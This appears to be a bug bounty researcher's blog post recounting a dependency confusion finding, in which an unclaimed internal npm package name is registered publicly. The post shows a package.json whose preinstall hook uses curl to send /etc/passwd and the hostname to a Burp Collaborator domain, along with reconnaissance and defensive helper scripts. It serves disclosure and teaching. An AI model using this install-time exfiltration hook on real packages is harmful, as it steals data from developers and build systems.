This story started with a rejected report.

Hey Everyone.

I’m Sagar Dhoot, a security researcher and bug bounty hunter with a strong interest in finding real-world vulnerabilities in modern web applications and software supply chains. Professionally, I work as an IAM Engineer at Seagate, where I focus on identity and access management technologies, including CyberArk, as well as cloud security and IAM on platforms such as AWS, Azure, and GCP. Alongside my corporate role, I actively hunt on bug bounty programs, exploring areas like web security, misconfigurations, and emerging attack surfaces in CI/CD pipelines and dependency ecosystems.

—

Rejected Report

Four months before this finding was finally rewarded, it was rejected.

At the time it felt like a typical bug bounty story. You find something interesting, report it, and it gets closed because you cannot prove impact. That is exactly what happened here.



During reconnaissance on a target I will call redacted.com, I was analyzing JavaScript files loaded by their dashboard application. Like many hunters, I rely on Burp Suite for this stage of reconnaissance. One extension that has proven extremely useful for JavaScript analysis is JS Miner, which extracts endpoints, secrets, and dependency references from JavaScript bundles.

While parsing the dashboard assets, JS Miner surfaced something unusual. Among the dependencies was a package name that did not look like a common public library:

recovery-npm-package

In total, I found three such unclaimed packages.
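How JS Miner identifies dependency names internally is not covered here, but one common way package names leak into client-side assets is through node_modules paths left behind in bundle comments or source maps. The sketch below assumes that pattern. The function name extractPackageNames and the sample text are hypothetical, made up for illustration.

```javascript
// Hypothetical helper: pull package names out of bundle or source-map text
// by looking for node_modules path segments. Assumes such paths were left in.
function extractPackageNames(bundleText) {
  // Matches node_modules/<name> and node_modules/@scope/<name>.
  const pattern = /node_modules\/((?:@[a-z0-9][\w.-]*\/)?[a-z0-9][\w.-]*)/gi;
  const names = new Set();
  for (const match of bundleText.matchAll(pattern)) {
    names.add(match[1].toLowerCase());
  }
  return [...names].sort();
}

// Made-up sample resembling module comments in a webpack-style bundle.
const sampleBundle = [
  "/* ./node_modules/react/index.js */",
  "/* ./node_modules/@babel/runtime/helpers/extends.js */",
  "/* ./node_modules/recovery-npm-package/index.js */",
  "/* ./node_modules/react/jsx-runtime.js */",
].join("\n");

console.log(extractPackageNames(sampleBundle));
```

Each name in the resulting list can then be compared against the public registry to see which ones are unregistered.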

The JavaScript chunk was being served from a CDN endpoint used by the dashboard: https://dashboard-production-f.redacted-cdn.com

Naturally, the next step was to check npm.

The package did not exist.
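This check can also be scripted. The following is a minimal sketch, assuming Node 18+ (for the global fetch) and assuming that a 404 from the public registry's metadata endpoint means the name is currently unregistered. The names registryUrl and isUnclaimed are illustrative and not part of any tool mentioned here.

```javascript
// Public npm registry base URL.
const REGISTRY = "https://registry.npmjs.org";

// Build the metadata URL for a package. Scoped names (@scope/name)
// need the slash between scope and name percent-encoded.
function registryUrl(name) {
  return `${REGISTRY}/${name.replace("/", "%2F")}`;
}

// Resolves to true when the public registry answers 404 for this name.
// Assumption: 404 is treated as "unregistered"; other statuses are not.
async function isUnclaimed(name) {
  const res = await fetch(registryUrl(name));
  return res.status === 404;
}

// Usage (performs a network request, so it is left commented out):
// isUnclaimed("recovery-npm-package").then(console.log);
```

A 404 only shows that the name is free on the public registry. It says nothing about whether any build system would actually resolve the name from there.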

At that moment I suspected a potential dependency confusion scenario. The application appeared to reference an internal dependency that was not registered publicly. If the build process resolved dependencies from the public npm registry, an attacker could potentially register the same package name and inject malicious code into the build pipeline.

This was my first time attempting a dependency confusion attack, and that lack of experience showed.

I claimed the package name and published a basic version of it. The payload was simple and intended only to detect installation events. I waited for callbacks.

Nothing happened.

Without proof of execution, the report was purely theoretical. The security team responded that the finding lacked demonstrable impact, and the report was closed.

At the time I accepted it and moved on. But I never fully forgot about it.

Four Months Later

Four months later I was going through old notes late at night when I came across the rejected report again.

Something about it kept bothering me.

The problem was not the discovery. The problem was the exploitation.

Back then I had only scratched the surface of how dependency confusion attacks actually work. I had claimed the package but I had not properly instrumented it to prove execution in a way that could not be dismissed.

So I decided to try again.

Revisiting the Target

I went back to npm and checked the package name again.

recovery-npm-package

It was still unclaimed.

This time I registered it properly and prepared a more controlled payload designed to capture clear evidence of execution.

The package contained two files: a simple index.js and a package.json containing a preinstall hook.

The package.json looked like this:

    {
      "name": "recovery-npm-package",
      "version": "0.0.32",
      "description": "anything you want",
      "main": "index.js",
      "scripts": {
        "preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname).[COLLABORATOR-ID].oastify.com"
      }
    }

The idea was simple.

If any system installed this package, the preinstall script would automatically execute. It would send the contents of /etc/passwd to my Burp Collaborator server, along with the hostname of the machine performing the installation.

This is a standard technique used in dependency confusion research because it safely demonstrates command execution without causing damage.
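From the defensive side, the same mechanism can be spotted by inspecting a manifest before installing it. The sketch below lists the install-time lifecycle scripts that npm runs automatically (preinstall, install, postinstall). The helper name findInstallHooks is hypothetical, and the sample manifest uses a harmless placeholder command rather than the real payload.

```javascript
// Lifecycle scripts that npm runs automatically while installing a package.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Return the install-time scripts declared in a parsed package.json object.
function findInstallHooks(pkg) {
  const scripts = pkg.scripts || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === "string")
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Sample manifest with a placeholder command standing in for a payload.
const sampleManifest = JSON.parse(`{
  "name": "recovery-npm-package",
  "version": "0.0.32",
  "main": "index.js",
  "scripts": {
    "preinstall": "echo placeholder-command",
    "test": "echo ok"
  }
}`);

console.log(findInstallHooks(sampleManifest));
```

Only the preinstall entry is reported, because the test script is not run during installation. Installing with npm's --ignore-scripts flag skips these hooks entirely.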

Once the package was published, I waited.

The Callbacks Begin



Within minutes my Burp Collaborator dashboard started receiving interactions. At first it was just one request.

Then another.

Then many more.

Each interaction was an HTTP request carrying the contents of /etc/passwd, along with the hostname and other metadata from the executing system. Multiple IP addresses were contacting my collaborator domain. The payload had executed successfully. This confirmed that the malicious package had been installed somewhere and that the preinstall hook had run during installation.

From a technical standpoint this demonstrated Remote Command Execution during dependency installation.
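Because the payload prepends $(hostname) to the collaborator domain, each callback carries the name of the machine that ran it. A rough sketch of how such callbacks could be triaged is shown below. The record shape ({ sourceIp, host }) is an assumption and not Burp Collaborator's export format, and the IPs, hostnames, and collaborator ID are made up.

```javascript
// Recover the hostname the payload prepended to the collaborator domain.
// Returns null when the Host value does not belong to that domain.
function reportedHostname(hostHeader, collaboratorDomain) {
  const host = hostHeader.toLowerCase().replace(/:\d+$/, ""); // drop any port
  const suffix = "." + collaboratorDomain.toLowerCase();
  return host.endsWith(suffix) ? host.slice(0, -suffix.length) : null;
}

// Group the distinct source IPs seen for each reported hostname.
function groupByHostname(interactions, collaboratorDomain) {
  const groups = new Map();
  for (const { sourceIp, host } of interactions) {
    const name = reportedHostname(host, collaboratorDomain);
    if (name === null) continue;
    if (!groups.has(name)) groups.set(name, new Set());
    groups.get(name).add(sourceIp);
  }
  return groups;
}

// Made-up records: documentation-range IPs and a placeholder collaborator ID.
const sampleInteractions = [
  { sourceIp: "192.0.2.10", host: "build-agent-7.example-id.oastify.com" },
  { sourceIp: "192.0.2.11", host: "build-agent-7.example-id.oastify.com" },
  { sourceIp: "198.51.100.4", host: "sandbox-01.example-id.oastify.com" },
];

for (const [name, ips] of groupByHostname(sampleInteractions, "example-id.oastify.com")) {
  console.log(name, [...ips]);
}
```

Grouping by hostname and source IP makes it easier to argue about who actually executed the package, which is the question that decides impact.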

Submitting the Report Again

This time I had real evidence.

The new report included:

- The JavaScript file referencing the dependency

- The unclaimed npm package name

- The malicious package published to npm

- Burp Collaborator interaction logs

- Exfiltrated /etc/passwd data

- IP addresses of systems that executed the payload

Two days later the security team responded.

Their response was interesting.

They wrote:

"Thanks for the info. We believe this issue to be a false positive. The list of IP’s you provided map to Chinese server providers. None of the IPs are mapped to our internal systems. Additionally, we’ve confirmed there is a YarnLock file in place so although you were able to ship a package with the same naming convention as our internal package, it would not have been susceptible to this attack. In order for this to have been exploitable, the /etc/passwd file would need to be pwn’d either on the dev laptop or build system.

Our current theory is this may be some form of third party scanner or actor that’s picked up and installed the poisoned packages when they are published.

The package used for your PoC wasn’t fully shipped internally, so we’ll be cleaning this up. Since this is more of a clean up effort, I’ll be bumping this down to a P3."

Reading that response left me with mixed feelings.

On one hand, they acknowledged the issue and planned to clean up the dependency. On the other hand, they believed the callbacks were coming from third-party scanners rather than their internal infrastructure.

I was both happy and unhappy at the same time.

Happy because the finding was recognized.

Unhappy because the actual impact I observed seemed stronger than what they believed.

Understanding What Happened

Dependency confusion attacks rely on a simple behavior of package managers.

When a package manager resolves a dependency, it checks configured registries. If the internal package name is not properly scoped or the registry configuration is not strict, the resolver may pull the package from the public registry instead of the private one.

If an attacker controls the public package with the same name, the malicious code executes during installation.
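As a first-pass audit, unscoped dependency names can be listed from a manifest, since those live in npm's shared global namespace. This is only a sketch: most unscoped names are ordinary public libraries, so the output still has to be cross-checked against what is internal. The helper names and the @acme scope are hypothetical.

```javascript
// A scoped name has the form @scope/name; anything else is unscoped.
function isScoped(name) {
  return /^@[^/]+\/[^/]+$/.test(name);
}

// Collect unscoped dependency names across the common dependency sections.
function unscopedDependencies(pkg) {
  const sections = ["dependencies", "devDependencies", "optionalDependencies"];
  const names = new Set();
  for (const section of sections) {
    for (const name of Object.keys(pkg[section] || {})) {
      if (!isScoped(name)) names.add(name);
    }
  }
  return [...names].sort();
}

// Made-up manifest: @acme is a placeholder scope, not a real organization.
const appManifest = {
  dependencies: {
    react: "^18.0.0",
    "@acme/ui": "^2.1.0",
    "recovery-npm-package": "^0.0.1",
  },
  devDependencies: { "@acme/lint-config": "^1.0.0" },
};

console.log(unscopedDependencies(appManifest));
```

Any internal package that shows up in this list is a candidate for moving under a scope the organization controls, or at least for being registered publicly as a placeholder.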

The preinstall script is particularly powerful because it runs automatically during installation, before the package is even fully installed.

In this case the attack chain looked like this:

- The application referenced an internal dependency.

- The package name was not claimed publicly.

- The attacker registered the package on npm.

- A system installed the dependency.

- The preinstall script executed.

- Data was exfiltrated to the attacker’s collaborator server.

Even if the callbacks originated from automated scanners or third-party actors monitoring npm packages, the core problem remained the same.

An internal dependency name was exposed publicly and could be claimed by anyone on the public registry.
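The security team's lockfile argument can be checked in a similar spirit. A Yarn v1 lockfile records a resolved URL for each entry, so one rough test is to see which host a given package was pinned to. The sketch below assumes the Yarn v1 text format. The function names, the sample lockfile, and the npm.internal.example host are all made up for illustration.

```javascript
// Extract the package name from a Yarn v1 entry header such as
//   left-pad@^1.3.0   or   "@scope/pkg@^1.0.0", "@scope/pkg@^1.1.0"
function entryName(header) {
  const firstSpec = header.split(",")[0].trim().replace(/^"|"$/g, "");
  return firstSpec.slice(0, firstSpec.lastIndexOf("@"));
}

// Return the hosts that lockfile entries for packageName were resolved from.
function sourcesFor(lockText, packageName) {
  const hosts = [];
  let current = null;
  for (const line of lockText.split(/\r?\n/)) {
    const isHeader =
      line !== "" && !line.startsWith(" ") && !line.startsWith("#") && line.endsWith(":");
    if (isHeader) {
      current = entryName(line.slice(0, -1));
      continue;
    }
    const m = line.match(/^\s+resolved "([^"]+)"/);
    if (m && current === packageName) hosts.push(new URL(m[1]).host);
  }
  return hosts;
}

// Made-up lockfile; npm.internal.example is a placeholder private registry.
const sampleLock = [
  "# yarn lockfile v1",
  "",
  "left-pad@^1.3.0:",
  '  version "1.3.0"',
  '  resolved "https://registry.yarnpkg.com/left-pad/-/left-pad-1.3.0.tgz#abc"',
  "",
  "recovery-npm-package@^0.0.1:",
  '  version "0.0.1"',
  '  resolved "https://npm.internal.example/recovery-npm-package/-/recovery-npm-package-0.0.1.tgz#def"',
].join("\n");

console.log(sourcesFor(sampleLock, "recovery-npm-package"));
```

If an internal package is pinned to the private registry, installs that honor the lockfile should fetch it from there. Any install path that ignores or regenerates the lockfile would not get that protection.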

Lessons Learned

This experience taught me several valuable lessons.

Rejected Reports Are Not Always Wrong

Sometimes a report is rejected because the impact was not demonstrated clearly enough. Revisiting old findings can lead to breakthroughs once you gain more experience.

Tooling Matters

Burp Suite extensions like JS Miner make JavaScript reconnaissance far more efficient. Modern applications ship massive bundles of code, and automated extraction tools can reveal hidden dependencies quickly.

Dependency Confusion Is Still Relevant

Even years after the original research popularized this attack, many organizations still expose internal package names through their client-side assets or build processes.

Final Thoughts

This vulnerability sat in my notes for four months.

At first it was just a rejected report. But revisiting it with a deeper understanding of dependency confusion turned it into a validated finding and eventually a bounty.

Bug bounty hunting often rewards persistence.

Sometimes the difference between a rejected report and a successful one is not the discovery itself but the ability to prove impact convincingly.

And sometimes the best findings are the ones you almost forgot about.

Connect

If you’re interested in discussing bug bounty, security research, or supply chain vulnerabilities, feel free to connect with me on LinkedIn.

https://www.linkedin.com/in/sagar-dhoot/